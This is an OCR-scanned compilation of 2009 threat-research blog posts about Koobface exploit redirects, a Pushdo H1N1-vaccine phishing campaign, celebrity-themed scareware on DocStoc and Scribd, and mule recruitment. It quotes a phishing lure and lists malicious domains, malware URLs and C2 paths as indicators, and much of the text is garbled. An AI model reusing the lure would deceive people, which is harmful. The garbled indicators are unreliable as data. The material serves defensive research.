privet2 .cn - Email: Exmanoize@qip.ru 
privet3 .cn - Email: Exmanoize@qip.ru 


sport-lab .cn - Email: abuseemaildhcp@gmail.com -> [26]money mule recruitment do- 
main [27]registrations 


trafdomins .cn - Email: Exmanoize@qip.ru 


neveetion 2 8092201 32/0 eo EE 
@ FS.232.211.32 (0x8 view /comolewyes/tgo 
7 om /conter 
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es 
es 
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. 
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*o 5 9 £88 
VEEE 228 


l SRE EB Cuscentty Gi tockmarts fl Catster 


The second iFrame domain parked at [28]61.235.117.83 redirects in the following way - 
kiano-180809 .com/oko/help.html - 61.235.117.83 - Email: bigvillyxxx@gmail.com leads to 
kiano-180809 .com/oko/dyna _soc.html -> kiano-180809 .com/oko/tomato guy 13.html -> 
kiano-180809 .com/oko/update.vbe -> kiano-180809 .com/oko/dyna_wm.wnf. 


The same exploitation structure is valid for the third iFrame domain - ttt20091124 
-info/oko/help.html which is again, parked at 61.235.117.83 and was embedded at Koobface- 
infected hosts over the past 24 hours. 


What prompted this shift on behalf of the Koobface gang? Declining infection rates - 
I’m personally not seeing a decline in the click-through rate, with over 500 clicks on a spamver- 
tised Kooobface URL over a period of 24 hours - or their obsession with traffic optimization? 
In terms of social engineering, the [29]periodic introduction of new templates proved highly 
successful for the gang, but the newly introduced outdated client-side exploits can in fact 
generate more noise than they originally anticipated, if they were to continue relying on 
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[30]social engineering vectors only. 


One thing’s certain - the Koobface gang is now on the offensive, and it would be inter- 
esting to see whether they’d introduce a new exploits set, or continue relying on the one 
offered by the web exploitation kit. 


Related posts: 

[31]Secunia: Average insecure program per PC rate remains high 
[32]Research: 80 % of Web users running unpatched versions of Flash/Acrobat 
[33]Fake Security Software Domains Serving Exploits 

[34]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[35]Koobface Botnet’s Scareware Business Model - Part Two 
[36]Koobface Botnet’s Scareware Business Model - Part One 
[37]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[38]New Koobface campaign spoofs Adobe’s Flash updater 

[39]Social engineering tactics of the Koobface botnet 

[40]Koobface Botnet Dissected in a TrendMicro Report 

[41]Koobface Botnet’s Scareware Business Model 

[42]Movement on the Koobface Front - Part Two 

[43]Movement on the Koobface Front 

[44]Koobface - Come Out, Come Out, Wherever You Are 

[45]Dissecting Koobface Worm’s Twitter Campaign 

[46]Dissecting the Koobface Worm’s December Campaign 
[47]Dissecting the Latest Koobface Facebook Campaign 


[48]The Koobface Gang Mixing Social Engineering Vectors 
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This post has been reproduced from [49]Dancho Danchev’s blog. 
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5.11.13 Summarizing Zero Day’s Posts for November (2009-11-30 20:00) 
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The following is a brief summary of all of my posts at ZDNet’s [1]Zero Day for November. 
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[2]You can also go through [3]previous summaries, as well as subscribe to my [4]per- 
sonal RSS feed, [5]Zero Day’s main feed, or follow all of [6]ZDNet’s blogs on Twitter. 


Notable articles include: [7]Windows 7’s default UAC bypassed by 8 out of 10 malware 
samples and [8]Man-in-the-middle attacks demoed on 4 smartphones. 


01. [9]JiHacked: jailbroken iPhones compromised, $5 ransom demanded 

02. [10]Which antivirus is best at removing malware? 

03. [11]Windows 7’s default UAC bypassed by 8 out of 10 malware samples 

04. [12]Source code for ikee iPhone worm in the wild 

05. [13]Commercial spying app for Android devices released 

06. [14]Man-in-the-middle attacks demoed on 4 smartphones 

07. [15]Thousands of web sites compromised, redirect to scareware - the latest virtual 
smoking gun of [16]the Koobface gang 


This post has been reproduced from [17]Dancho Danchev’s blog. 


. http: //blogs.zdnet.com/securit 
. http: //ddanchev. blogspot .com/2009/10/summarizing-zero-days-posts-for.html 
. http: //ddanchev. blogspot .com/2009/11/summarizing-zero-days-posts-for-october.html 


http: //updates.zdnet .com/tags/dancho+danchev.html1?t=0&s=0&0=1&mode=rss 


. http: //feeds.feedburner.com/zdnet/securit 
. http: //twitter.com/zdnetblogs 
. http://blogs.zdnet .com/security/?p=482 


10. 
12, 
13, 
15, 
16. 
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5.12 December 


5.12.1 Pushdo Injecting Bogus Swine Flu Vaccine (2009-12-02 09:32) 


CDE) Centers for Disease Control and Prevent 


Personal HiN1 Gaecnalion Profile 


HINI Vaccnaton 
Profle 


Your Personal H1N1 Vaccinating Profile is an dectronic document, which contains your name, 
carla) pte ah he sustained in your 

childhood or what kind of allergy you have to some certain drug). Al instructions you need are 
Induded in the archive below: 

© Your Temaporary ID (valid for 48 howrs) H1IN1-1574377270 

2 HAIN1 Vaccination Profile 


Page last modified Wednesday, December 2, 2009 


Cortact Us 


Cota ter leas Canal 
Centers for Disease and Prevention 600 Cifton Rd. selentn, GA 30333, USA Qepamment of sepnh 
sooeoe Snr (es0.232-0636)T7" (ess) Yaieoed, 2 Hours/Every Oey - cecnlo Sede gew ¢ fs net a tele 


In the spirit of systematically introducing new themes in order to serve the ubiquitous 
crimeware releases, [1]the Pushdo botnet has now switched to a [2]State Vaccination HIN1 


Program campaign, serving [3]vacc _profile.exe sample. 


Sample subject: State Vaccination Program; Governmental registration program on the H1N1 
vaccination 

Sample message: "You have received this e-mail because of the launching of State 
Vaccination H1N1 Program. You need to create your personal H1N1 (swine flu) Vaccination 
Profile on the cdc.gov website. The Vaccination is not obligatory, but every person that has 
reached the age of 18 has to have his personal Vaccination Profile on the cdc.gov site. This 
profile has to be created both for the vaccinated people and the not-vaccinated ones. This 
profile is used for the registering system of vaccinated and not-vaccinated people. Create 
your Personal H1N1 Vaccination Profile using the link." 
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Subdomain structure used: 


online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
online.cdc.gov 
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.lykasf.be 
.lykasm.be 
.lykasv.be 
.lykasz.be 
-nyugewc.be 
-.nyugewd.be 
-.nyugewm.be 
-nyugewn.be 
-nyugewq.be 
-nyugewt.be 
-.nyugeww.be 
-nyugewy.be 
-.nyugewz.be 
-yhnbad.co.im 
-yhnbad.com.im 
-yhnbad.im 
-yhnbad.net.im 
-yhnbad.org.im 
-yhnbak.co.im 
-yhnbak.com.im 
-yhnbak.im 
-yhnbak.net.im 
-yhnbak.org.im 
-yhnbam.co.im 
-yhnbam.com.im 
-yhnbam.im 
-yhnbam.net.im 
-yhnbam.org.im 


186.14.81.102 ———“EL_> 186.14.64.0119 ——“S-m as21826 


186.80.92.113 ———YEL__-> 186,80.88.0/21 
AS 
186.81.76.214 ———NEL_g® 196.91.76.0/22 ——4S-m> as10620 


— 


190.158.136.139 ——“EL pe 190.158.136.0/22 
189.201.17.28 ———NEL_—-> 199.201.0.0:17 ——“S—» asso4 
189.202.66.253 ———MEL gs 199.202.64.0/21 ——AS-ge as29545 


190.141.248.127 ——NEL_pe 190.141.128.017 ——S-m asisso9 


; 190.204.101.9 ———NEL_gs 190.204.0.0:16 ——4“S—gm» assoas 
cdc.govyhnbam.com.im 
= 200.92.117,253 ———MWEL ge 200.92.0.0/16 
\ " - 
A 189.193.74.73 ———NEL_g 199.192.0.0:13 ——“S-m as13999 
201.164.172.230 ——NEL—g 201.164.0.0/15 


201,158.75.143 ———MEL gs 201.158.74.0/23 ——A2-ge as29518 


200.116.53.42 ———NEL_ gs 200.116.52.0/23 
AS13489 


201.232.200.143 ——MEL-y 201.232.192.0/20 
uP 


201.173.45.118 ———“EL_-g» 201.173.0.0116 ——AS-g» asiisss 


govyhnbam.com.im 


Actual domains involved: 


feccxz.co .uk; feccxz.me .uk; ficcxz.co .uk; gerfase .be; gerfasi .be; gerfaso .be; gerfasq .be; 
gerfasr .be; gerfast .be; gerfasu .be; gerfasw .be; gerfasx .be; gerfasy .be; hssaze .be; 
hssazg .be; hssazh .be; hssazi .be; hssaz j.be; hssazl .be; hssazo .be; hssazp .be; hssazq .be; 
hssazr .be; hssazt .be; hssazu .be; hssazw .be; hssazy .be; kiooojl .be; kioooj2 .be; kioooj3 
:be; kioooja .be; kiooojb .be; kiooojc .be; kiooojf .be; kiooojg .be; kiooojh .be; kiooojn .be; 
kiooojq .be; kiooojv .be; kiooojx .be; kiooojz .be; yhnbad.co .im; yhnbad.com .im; yhnbad 
.im; yhnbad.net .im; yhnbad.org .im; yhnbak.co .im; yhnbak .com.im; yhnbak .im; 
yhnbak.net .im; yhnbak.org .im; yhnbam.co .im; yhnbam.com .im; yhnbam .im; yhnbam.net 
.im; yhnbam.org .im; yurbzc.co .im; yurbzc.com .im; yurbzc .im; yurbzc.net .im; yurbzc.org 
.im; yurtzc .im; yuvtzc.co .im; yuvtzc.com .im; yuvtzc .im; yuvtzc.net .im 
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DNS SERVERS OF NOTICE: 

ns1.elkins-realty .org - Email: HR2000@gmail.com 
nsl.a-personalhire .com - Email: personalhire@mail.com 
nsl.iceagestrem .com 

ns1.poolandmonster .com 

nsl.autotanscorp .net 

nsl.shuzmen .com 


Upon execution, the sample phones back to 193.104.41.75/kissme /rec.php and 
193.104.41.75 /ip.php, while attempting to download promed-net .com/css/[4]absderce2.exe 
and 193.104.41.75/ cbd/[5]75.bro, with the IP itself already [6]blacklisted by the Zeus Tracker, 
as well as related activity on the same netblock - [7]AS49934 (VVPN-AS PE Voronov Evgen 
Sergiyovich). 


Related posts: 

[8]"Your mailbox has been deactivated" Spam Campaign Serving Crimeware 
[9]Ongoing FDIC Spam Campaign Serves Zeus Crimeware 

[10]The Multitasking Fast-Flux Botnet that Wants to Bank With You 


This post has been reproduced from [11]Dancho Danchev’s blog. 


1. http: //us.trendmicro.com/imperia/md/content/us/pdf/threats/securitylibrary/study_of_pushdo. pdf 
2. http: //www.m86security.com/trace/traceitem.asp?article=1201 
3. ttp://www.virustotal.com/analisis/4f1a5551a5fec27950ad99b6c63d568c7c712577121e6blaa4cdf1ec7549c227- 1259 


4 
700 

5 
6. https: //zeustracker .abuse.ch/monitor .php?host=193.104.41.75 


7. https://zeustracker.abuse.ch/monitor . php?as=49934&filter=online 


8. http: //ddanchev. blogspot .com/2009/11/your-mailbox-has-been-deactivated-spam.htm 


9. http: //ddanchev. blogspot .com/2009/10/ongoing-fdic-spam-campaign-serves-zeus.htm 


10. http: //ddanchev.blogspot .com/2009/07/multitasking-fast-flux-botnet-that.htm 
11. http://ddanchev.blogspot.com/ 
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5.12.2 Celebrity-Themed Scareware Campaign Abusing DocStoc and Scribd 
(2009-12-03 22:18) 


Signin | Register 


docstac | Dec « | Collect -| bes Spee ‘Decsure search all docs 
~ 
Shalom Harlow naked video, Shalom Harlow nude photos + download this doc 
— ‘ cree 57 te Be e = Shalom Hartow = 
nude video, Shalom 
doc strc 4) ’ © 6362 Gm Ful Screen | f Download | Harlow nakec video 
@ Shalom Harlow sex 
pecs | Shalom 
Harlow nude scene 
| ons an 
@ nalom Hartow 
private movie | 
Shalom Harlow 


nude pies 


wm Unmmo Watson sex — 
tape, Emma Watson 
pussy aj 


= Kate Bekinsale 
nude video, Kate 
Bekinsale private 
movie 


= Suzanne Somers 
Sex scene, Suzanne 
Somers sex pics 


UPDATED: DocStoc has removed all the participating profiles and their documents. 


A currently ongoing scareware campaign is using celebrity-themed blackhat SEO tactics 
in order to hijack legitimate traffic by abusing the popular DocStoc and Scribd document- 
sharing services. What’s the single most interesting thing about this campaign anyway? It’s 
fact that one of the domains parked on the same IP that the rest of the malware and exploit 
serving ones are - they naturally multitask and engage in drive-by attacks - newsoff .net 
has been registered with the same email pvcprotect@gmail.com as the original gumblar .cn 
domain. 


Once the user clicks on the bogus video window embedded as an active document, which 
as matter of fact doesn’t issue any warning that the user is leaving the site, a redirection 
takes place through shurus .net/in.cgi?3 -> b.corlock .net/main. html - 188.165.65.173 - Email: 
jessica357ass@gmail.com where the user is asked to download [1]load.exe. 
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*.curah.net 


* klirok.net A 


*murtrnet 


* newsoff.net 


* offnews.cn 


* shurus.net 


curah.net 


hostmaster.curah.net 


hostmasterklirok.net : . 


198.165.65.173 HET 188.165.0.016 ——“S-p AS16276 
hostmastermurrnet 4 
hostmasternewsoti.net 


hostmaster.ofinews.cn 
hostmaster.shurus.net 
kKlirok.net 
murrnet 
newsofi.net 
offnews.cn 


shurus.net 


Parked on [2]the same IP is the rest of the domains portfolio, which is also involved in separate 
drive-by campaigns: 

offnews .cn - Email: cuitiankai@googlemail.com 

newsoff .net - Email: pvcprotect@gmail.com - Ooh la la, the original gumblar .cn has been 
registered with the same email 

curah .net - Email: jessica357ass@gmail.com 

corlock .net - Email: jessica357ass@gmail.com 

klirok .net - Email: jessica357ass@gmail.com 

murrr .net - Email: jessica357ass@gmail.com 

shurus .net - Email: jessica357ass@gmail.com 
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(_)Scribd 

Home Explore Community it) Upload 
‘= soLeben & Arbeiten 63" 
i ~~ inden USA! Wie 


Elin Nordegren, Elin Nordegren naked scene , Elin Nordegren private movie 


4 “ @ hw @ Femoree 


Sample Scribd activity per username: 

lupan13 - 1,148 documents; 3,301 total reads 
jess357 - 877 documents; 15,202 total reads 
mumukan - 875 documents; 19,791 total reads 
cekalo - 874 documents; 2,926 total reads 


Sample Docstoc activity per username: 
valaman - Docs: 460; Views: 13224 
zalupa - Docs: 407; Views: 14397 
monilit - Docs: 871; Views: 5265 
babaka - Docs: 252; Views: 183 
namaska - Docs: 139; Views: 8 
rumaska - Docs: 829; Views: 172 
zuzya - Docs: 748; Views: 280 
malinal3 - Docs: 66; Views: 15377 
yoqeojegu - Docs: 9; Views: 3284 
ryjokoleqayebi - Docs: 10; Views: 326 
jopan13 - Docs: 397; Views: 43876 
iculyodysocehi - Docs: 10; Views: 3721 
lupan13 - Docs: 414; Views: 29275 


a |i) Sie 


Alive» Player 
— 


I sport-TV 100% & a3 
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(_) Scribd 


Home Explore Community it) Upload Legin SignUp Help 
lupant3 
lupant3’s Documents a 
lupant) published 
lupant3 a 
i=] from hupant 3 
a 
matte ' a 
Repty 
Send lupant} sage 
lupant) published a 
105 tated fen Jelena Dokic, Jelena Dokic pussy , 
Ea Jelena Dokic topless v 
. tupent} in Busmess & Law 
SUBSCRIBE RS. - ‘ n a 
co TO 
id 
iepty 
ad 


lupant) published 


Kristen Bell, Kristen Bell naked ra 
photos , Kristen Bell ho. 
from lupant} in Business & Law 


Upon execution it drops the Home AntiVirus 2010 scareware which features a "Spyware Alert!" 
security warning explaining the dangers of Worm.Win32.NetSky. The scareware ([3]Setu- 
pAdvancedVirusRemover.exe) is downloaded [4]from downloadavr13 .com - 193.104.110.50 
- Email: noxim@maidsf.ru. Parked on the same IP is a well known portfolio of scareware 
domains, first [5]observed in July and most recently [6]in September: 


10-open-davinci .com 

advanced-virusremover2009 .com - Email: giogr@ua.fm 
advancedvirus-remover2009 .com - Email: jopa@gmail.com 
advanced-virus-remover2009 .com - Email: masle@masle.kz - [7]seen in July, 2009 
advancedvirusremover-2009 .com - Email: eptit@eptit.us 
advanced-virusremover-2009 .com - Email: support@antivirus-xp-pro2009.com 
advancedvirus-remover-2009 .com - Email: ttl@ua.fm 
advanced-virus-remover-2009 .com - Email: ubiv@i.ua 
advancedvirusremover-2010 .com - Email: noxim@maidsf.ru 
advanced-virus-remover-2010 .com - Email: noxim@maidsf.ru 
anti-virus-xp-pro2009 .com - Email: chen.poon1732646@yahoo.com 

best-scan .biz - Email: noxim@maidsf.ru 

best-scan .com - Email: noxim@maidsf.ru 

best-scan-pc .biz - Email: noxim@maidsf.ru 
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best-scanpc .com - Email: alex@mail.ge 
best-scan-pc .com 

best-scanpc .net 

best-scan-pc .net 

coolcount1 .com - Email: noxim@maidsf.ru 
coolcount2 .com - Email: noxim@maidsf.ru 
downloadavr10 .com - Email: noxim@maidsf.ru 
downloadavr11 .com - Email: noxim@maidsf.ru 
downloadavr12 .com - Email: noxim@maidsf.ru 


Advanced 


Virus Remover 


TRIAL VERSION 


Advanced Virus Remover is a registered trademark. All rights reserved 


downloadavr13 .com - Email: noxim@maidsf.ru 

downloadavr3 .com - Email: support@antivirus-xp-pro2009.com 
downloadavr4 .com - Email: ttl@ua.fm 

downloadavr5 .com - Email: vs@ua.km 

downloadavr6 .com - Email: alex@i.ua 

downloadavr7 .com - Email: noxim@maidsf.ru 

downloadavr8 .com - Email: noxim@maidsf.ru 

downloadavr9 .com - Email: noxim@maidsf.ru 

hard-xxx-tube .com 

malware-scan .net - Email: noxim@maidsf.ru 

malware-scaner .net - Email: noxim@maidsf.ru 

masterhost.co .in - Email: pricklyy@mail.ru 

onlinescanxppro .com - Email: chen.po0on1732646@yahoo.com 
pc-scanner .info - Email: noxim@maidsf.ru 

pc-scanner-2010 .net - Email: noxim@maidsf.ru 

pc-scannerr .biz - Email: noxim@maidsf.ru 

pc-scannerr .com - Email: noxim@maidsf.ru 

pc-scannerr .info - Email: noxim@maidsf.ru 

pc-scannerr .net - Email: noxim@maidsf.ru 
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pc-scannerr .us - Email: noxim@maidsf.ru 

testavrdown .com - Email: support@antivirus-xp-pro2009.com 

testavrdownnew .com - Email: mamed@i.ua 

trucount3005 .com - Email: chen.po00n1732646@yahoo.com - [8]money-mule recruitment 
connection 

trucountme .com - Email: valentin@gergiea.kz - [9]Jalready profiled 

white-xxx-tube .com - Email: noxim@maidsf.ru 

xxx-white-tube .biz - Email: noxim@maidsf.ru 

xxx-white-tube .net - Email: gnom@gnom.ge 


DocStoc and Scribd have been notified. 


Related posts: 

[10]The Ultimate Guide to Scareware Protection 

[11]Scareware Campaign Using Google Sponsored Links 

[12]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 

[13]Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign 

[14]U.S Federal Forms Blackhat SEO Themed Scareware Campaign Expanding 

[15]Blackhat SEO Campaign Hijacks U.S Federal Form Keywords, Serves Scareware 

[16]A Peek Inside the Managed Blackhat SEO Ecosystem 

[17]Dissecting a Swine Flu Black SEO Campaign 

[18]Massive Blackhat SEO Campaign Serving Scareware 

[19]From Ukrainian Blackhat SEO Gang With Love 

[20]From Ukrainian Blackhat SEO Gang With Love - Part Two 

[21]From Ukraine with Scareware Serving Tweets, Bogus LinkedIn/Scribd Accounts, and Black- 
hat SEO Farms 

[22]Fake Web Hosting Provider - Front-end to Scareware Blackhat SEO Campaign at Blogspot 


This post has been reproduced from [23]Dancho Danchev’s blog. 


pay 


ttp://www.virustotal.com/analisis/813a5f050f 00f 9bf 1468c4599bdb523f decdf 44934341377ea944b29d1cb39ab- 12598 
ttp://whois.domaintools.com/188.165.65.17 


2. 
3. ttp://www.virustotal.com/analisis/b26a3527 2eb88e2f d96350d67f 04728947 ceb53c7a14b3617a38556997 5e2ee6- 12598 
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6. 
7. http: //ddanchev. blogspot .com/2009/07/diverse-portfolio-of-fake-security.htm 
8. 
9. 
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. http://ddanchev. blogspot .com/2009/05/dissecting-swine-flu-black-seo-campaign.htm 


. http://ddanchev. blogspot .com/2009/04/massive-blackhat-seo-campaign-serving.htm 


. http://ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with.htm 

. http://ddanchev. blogspot . com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 
. http://ddanchev. blogspot . com/2009/06/from-ukraine-with-scareware-serving.htm 

. http://ddanchev. blogspot . com/2009/06/fake-web-hosting-provider-front-end-to.htm 


23. http://ddanchev. blogspot .com/ 


5.12.3 Keeping Reshipping Mule Recruiters on a Short Leash (2009-12-07 20:26) 


Following my previous "[1]Keeping Money Mule Recruiters on a Short Leash" and "[2]Stan- 
dardizing the Money Mule Recruitment Process" posts, the campaigners behind the previously 
exposed money-mule recruitment domains looking for "[3]payment processing assistant", are 
now also looking for "mailing assistants" to reship the fraudulently purchased items using 
stolen financial data. 
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Parcel 


Solutions that you need! 


What happens once they standardize the practice? The network of reshipping mules ends up 
as as a [4]web-based command and control interface, allowing the customers of the mule 
recruitment syndicate to easily monitor the activity regarding their fraudulently purchased 
goods. In both of these models, the single most evident benefit for the cybercriminal remains 
the risk-forwarding of the entire process to the unknowingly participating in the cybercrime 
ecosystem employee. 


Some of the new and currently active reshipping mule recruitment brands include - To- 
tal River Goods, Fargo River Goods, Irish River Goods and Parcel Alliance. Here’s how they 
describe themselves: 
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payment business = completion 
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"As an independent logistics provider, Total River Goods offers supply logistics management 
and transportation management services including: freight forwarding, packages forwarding, 
parcel forwarding, postal services and other postal services. Total River Goods is the world’s 
active developer of retail shipping, business and postal online service centers. Since develop- 
ment begun in 2000 we listened to our clients and developed our services based on feedback 
we have received. Our service evolved through the years and at this moment of time looks 
and feels how our customers want. 


After many years of development and testing, in 2008 we released our online shipping 
service. With the new online service Total River Goods is true virtual mail service. We are 
constantly adding to our services ensuring that we will stay the market leader. Please feel free 
to contact us if you have any questions or comments. Unlike many other online organizations, 
we have a goal to reply to all queries within 24 to 48 hours, including business days and 
weekends." 


Domains involved: 

totalrivergoods .com - 94.103.90.130 - Email: justin _dickerson@ymail.com - used in [5]money- 
mule recruitment domain registration 

fargorivergoods .com - 94.103.90.130 - Email: williamashley40@yahoo.com 

parcelalliance .com - 94.103.90.200 - domainprivate@communigal.com 

irishrivergoods .com - 94.103.90.130 - Email: MarcusStraker909@gmail.com - [6]used in 
money-mule recruitment domain registration 


Thanks to Derek from [7]aa419.org for the ping. 


Related posts: 
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[8]Keeping Money Mule Recruiters on a Short Leash 
[9]Standardizing the Money Mule Recruitment Process 
[10]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[11]Money Mules Syndicate Actively Recruiting Since 2002 
[12]Inside a Money Laundering Group’s Spamming Operations 


This post has been reproduced from [13]Dancho Danchev’s blog. 


ct 
ct 
uel 
~ 
~ 
Qa 
Q 
o@ 
=} 
a 
ia 
(0) 
g 
ion 
# 
fe} 
oq 
n 
uel 
° 
ct 
fa) 
° 
B 
~ 
N 
fo} 
fo} 
oo 
~ 
a 
an 
Poe 
yr 
() 
) 
ue) 
BH 
b 
0Q 


short.htm 


8 
° 
5 
oO 
< 
8 
a 
H 
oO 
4 
oO 
ie) 
4 
e 
fi 
ct 
(0) 
5 
n 
° 
fi 


1 

2. http: //ddanchev. blogspot .com/2009/10/standardizing-money-mule-recruitment .htm 
3. http: //www.fbi.gov/pressrel/pressrel09/ach_110309.htm 

4 1 

5. http: //ddanchev. blogspot .com/2009/10/standardizing-money-mule-recruitment.htm 
6 
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. http: //ddanchev. blogspot .com/2009/11/keeping-money-mule-recruiters-on-short.htm 

. http: //ddanchev. blogspot .com/2009/10/standardizing-money-mule-recruitment .htm 


10. http: //ddanchev. blogspot .com/2008/07/money-mule-recruiters-use-asproxs-fast.htm 
11. http: //ddanchev.blogspot.com/2008/10/money-mules-syndicate-actively.htm 


. http: //ddanchev.blogspot .com/2009/05/inside-money-laundering-groups- spamming .htm 


13. 
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5.12.4 Celebrity-Themed Scareware Campaign Abusing DocStoc (2009-12-07 22:17) 


Son in Hewester 


nr ——_—___— 
pt SESE sme oo 
& Tila Tequila Sex Tape 
embed Cet Jey Der & astokie wiews & rete m aa | 
docstic (<a >) 9 Gm Fuscen Fy one. | Comet 2 
fy CTila Tequila Sex 


Tape 
Tila Tequila Sex 

m Tape 
joes 4 | Onwntonte: | 

gy sCTila Tequila Sex 
Tape Pe 


Maequita, 140 tequila nude, tla toquée naked. bla toquela mot, tia tecuela wallpaper, ta toquela 
ats, lB toquia pussy, bla tequila secs. Sta loquala Dkini. Sta tequila see ery. bla toquiky 
lopless, Nude bla loquila, naked ta tequila, 1 teavda Nude pecs. ta tequila tales, tila tequila 
har. Ma tequila having, tree tila tequila wallpaper hot, tiie tequia hairstyles, tia tequila. tla 
tequila boobs, tt tecnla tits. Sta tequila sin oty, tite tequila feet, sta tequila pictures. bia 
legal playboy, tila tequila tape. tia lequila’s baby, 18 tecala wallpapers. het a tequila, tia 
Pg Ma tequila, ta tequila photos, la tequila honey, tia tequila 

Sia tequila take, tia tequila’s pussy, tia tequila in bécini, ta tecuata nuda, tite toquiiy 
sansie a leesbaneteiaten Wh egta coed, Oh edi aee, Sse te 
ctur >! L i U u hot het. th 


honor, bla lequila breast, tila tequia nue. dla lequila’s DOobS, tila tequila 2006. bla tequila 
Nipples. ee ia ernie cating. entice 20. S08 St eae, 


bikin, rich magazine ta equi, tia teala nip sip. ta teow nude photos, tha ioqulatace 
pics. dla toquita hotest photos, tia tequila video, dla tequila short hair, tia toquita's Faw, 


UPDATE: Docstoc has removed all the participating accounts in this campaign, and is applying 
additional filtering to undermine its effectiveness. 


Last week’s "[1]Celebrity-Themed Scareware Campaign Abusing DocStoc and Scribd" is 
now exclusively targeting the popular Docstoc document-sharing service. Naturally, this 
very latest campaign once again offers overwhelming evidence on the inner workings of the 
cybercrime ecosystem, in this particular case, the connection between the Koobface gang and 
money mule recruitment campaigns. 
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COOKBOOK nose picker 
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Octopus 


Play Retarded Guy Ort, 


So let’s cut to the chase before we expose the entire campaign, and have all the involved 
profiles removed. One of the most popular bogus video site link embedded in these documents, 
wildyourvideo .com - 188.130.250.246 - gevtone@gmail.com, is using NS1.FUCKABUSE .BIZ - 
abusehostserver@gmail.com - as its nameserver. The same email was also used to registered 
some of the [2]client-side exploit serving domains part of the Koobface drive-by download 
experiment, and is also known to [3]have been used in registering [4]money-mule recruitment 
[5]domains. 


Automatically registered Docstoc accounts involved: 
docstoc .com/profile/abefugymyu16261 
docstoc .com/profile/acihofabulobe4403 
docstoc .com/profile/adisareiecij23245 
docstoc .com/profile/apyauputy10168 
docstoc .com/profile/aqoqulicumisah16835 
docstoc .com/profile/aqypycapytu4493 
docstoc .com/profile/atirogesepuioh10057 
docstoc .com/profile/atolageleraru 
docstoc .com/profile/ayluleasyte37 
docstoc .com/profile/bacuqelufukone 
docstoc .com/profile/bibiemymiea12218 
docstoc .com/profile/bonituhibo18350 
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.com/profile/bypopopihebyguk15216 
.com/profile/byqaocopymyn 
.com/profile/cubaaacanejof26562 
.com/profile/daaqajyceqehi21058 
.com/profile/deuymyhocapaqu2971 
.com/profile/dorusefykylam 
com/profile/dyahucybofuk 
com/profile/eaahuigu 
.com/profile/eduobecoyy23483 
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Sampled accounts are currently advertising some of the following domains - wildyourvideo 
.com - 188.130.250.246 - gevtone@gmail.com - where the malware is obtained from technol- 
ogyplayer .com/[6]xvidplayer.45206.exe which phones back to: 


central-arts-gallery .com - 216.240.146.126 - aproctor@who.net 
gold-ballade-art .com - 66.199.229.230 - madkins@outgun.com 
global-arts-area .com - 64.27.5.204 - tcrotts@safrica.com 


Related Docstoc accounts also link to two Blogspot accounts - carrie-prejean-sex-tapes 
:blogspot.com; carrie-prejean-sextape-video-free .blogspot.com advertising tv-world-online 
snet - 558.218.199.186 - breathy3@gmail.com with the malware obtained from freebigutilites 
.com/[7]install ActiveX.45171.exe. 
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Parked on 58.218.199.186 are also related domains, with money-mule recruitment domain 
involvement: 

On-china .cn - Email: abusehostserver@gmail.com 

bigitube .com - Email: lastomarino@gmail.com 

free-video-portall1 .info - Email: kokishpoki@gmail.com 
free-video-portal4 .info - Email: kokishpoki@gmail.com 
greatmagice .com 

i-finally-found .cn - Email: Michell.Gregory2009@yahoo.com 
relevant-information .cn - Email: steven lucas 2000@yahoo.com 
search-results .cn - Email: hilarykneber@yahoo.com 
share-video-portall .info - Email: kokishpoki@gmail.com 
share-video-portal4 .info - Email: kokishpoki@gmail.com 

spainsn .com - Email: ijushdf@gmail.com 

usworkingspace .com - Email: ijushdf@gmail.com 
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web-paradise .cn - Email: steven lucas 2000@yahoo.com 
wed-bew .cn - Email: Michell.Gregory2009@yahoo.com 
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mediagroup2009.com 
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ns2.1234host.net 
setmoviesott.net 


technologyplayer.com 


The domain location domain freebigutilites.com responds to 69.10.41.147, parked on the 
same IP are the rest of the domains used in this and related campaigns: 
bbflashplugin .com - Email: davidg@representative.com 
bestflashplugins .com - Email: rcuthbertson@witty.com 
digitalmultimediasoftware .com - Email: cperry@wallet.com 
frashflashplugins .com - Email: rcuthbertson@witty.com 
freebigutilites .com - Email: sybarra@yours.com 
freemegautilites .com - Email: sybarra@yours.com 
globaltechsoftware .com - Email: cperry@wallet.com 
loadmoviesoft .com - Email: virgilm@disciples.com 
mediaarchive2009 .com - Email: mmerchant@priest.com 
mediadatastorage .net - Email: patrickf@loveable.com 
mediagroup2009 .com - Email: mmerchant@priest.com 
multimediafact .com - Email: patrickf@loveable.com 
multimediafiles .net - Email: mcastillo@mindless.com 
setmoviesoft .net - Email: virgilm@disciples.com 
soft-multimedia .com - Email: terryl!@dbzmail.com 
superOmultimedia .com - Email: terryi@dbzmail.com 
technewdata .com - Email: mcastillo@mindless.com 
technologyplayer .com - Email: amcdaniel@witty.com 
thebbflashplugin .com - Email: davidg@representative.com 
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Docstoc has been notified of the involved usernames, and should take action against 
them quickly. Naturally, the attacks would continue due to the apparent [8]outsourcing of the 
CAPTCHA solving process. 


Related posts: 

[9]The Ultimate Guide to Scareware Protection 

[10]Celebrity-Themed Scareware Campaign Abusing DocStoc and Scribd 

[11]Scareware Campaign Using Google Sponsored Links 

[12]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 

[13]Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign 

[14]U.S Federal Forms Blackhat SEO Themed Scareware Campaign Expanding 

[15]Blackhat SEO Campaign Hijacks U.S Federal Form Keywords, Serves Scareware 

[16]A Peek Inside the Managed Blackhat SEO Ecosystem 

[17]Dissecting a Swine Flu Black SEO Campaign 

[18]Massive Blackhat SEO Campaign Serving Scareware 

[19]From Ukrainian Blackhat SEO Gang With Love 

[20]From Ukrainian Blackhat SEO Gang With Love - Part Two 

